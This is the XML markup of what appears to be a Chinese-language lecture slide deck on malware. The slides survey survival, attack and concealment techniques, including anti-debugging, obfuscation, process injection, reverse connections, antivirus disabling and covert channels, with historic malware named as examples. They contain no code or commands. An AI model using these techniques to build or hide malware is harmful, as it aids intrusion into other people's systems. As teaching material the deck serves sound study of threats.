        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="肘形连接符 27"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="15" idx="3"/>
            <a:endCxn id="2" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3465830" y="1124585"/>
            <a:ext cx="7167880" cy="4925695"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -12996"/>
              <a:gd name="adj2" fmla="val 104834"/>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4" idx="1"/>
            <a:endCxn id="2" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4753610" y="1590675"/>
            <a:ext cx="46164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737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恶意代码实现关键技术</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2021205" y="1113155"/>
            <a:ext cx="9461500" cy="2676525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>一个好的恶意代码，必须要有良好的隐蔽性、生存性，不能被杀毒软件轻易察觉，以及良好的攻击性。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>恶意代码实现关键技术：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>恶意代码生存技术</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>恶意代码攻击技术</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>恶意代码隐蔽技术</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恶意代码生存技术</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="982980"/>
            <a:ext cx="10263505" cy="4887595"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>恶意代码的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>生存技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>主要包括4个方面:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>反跟踪技术：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>提高自身的伪装能力和防破译能力，增加检测难度。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>     动态技术：禁止跟踪中断、封锁键盘输入和屏幕显示、检测运行环境等；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>     静态技术：对代码分块加密执行、伪指令法等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>加密技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>     包括信息加密、数据加密和代码加密等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>模糊变换技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>      包括指令替换、质量压缩、指令扩展、伪指令、重编译技术等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>自动生成技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>      采用不同算法生成功能各异的恶意代码，将普通病毒编译成复杂病毒等。</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恶意代码攻击技术</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="829945"/>
            <a:ext cx="10263505" cy="5367655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>进程注入技术：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>将恶意代码注入到与服务（系统服务和网络服务）相关的可执行代码中，被多个应用程序加载，实现自身隐藏启动和运行。如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>WinEggDropShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>可以注入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的大部分服务。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>三线程技术：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>恶意代码同时启动远程控制进程、监视进程（监视是否被删除或被停止自启动）和守护进程（注入到其他可执行文件中，实现可持续启动），如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中国黑客</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>端口复用技术：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>使用系统网络服务打开的端口，如25、80、135等，伪装。如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Executor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>端口传输数据和控制信息，实现远程控制。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>超级管理技术：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>对反恶意代码软件进行攻击，使其无法正常工作，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>广外女生</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>金山毒霸</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>进行拒绝服务攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>端口反向连接技术：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>恶意代码的被控制端主动连接控制端，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>灰鸽子</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>缓冲区溢出攻击技术：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>恶意代码获得被攻击主机的部分或全部控制权，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>红色代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>尼姆达</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>蠕虫。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">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恶意代码隐蔽技术</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="972820"/>
            <a:ext cx="10263505" cy="4407535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>本地隐藏技术</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>：文件名更名为合法文件名。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>进程隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>：附着或系统系统进程，以合法身份运行。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>网络连接隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>：复用当前网络服务端口，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>端口。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>编译器隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：攻击者是编译器开发人员，实施原始分发攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>网络隐藏技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>通信内容隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：对通信内容加密。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>传输信道隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：一个进程能够直接或者间接访问某存储空间，而该存储空间又能被另外一个进程访问，构成了隐蔽存储通道。</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866013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攻击可以通过多种方式隐藏恶意意图并掩盖自己的真实性</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2215515" y="895985"/>
            <a:ext cx="9542780" cy="4515485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
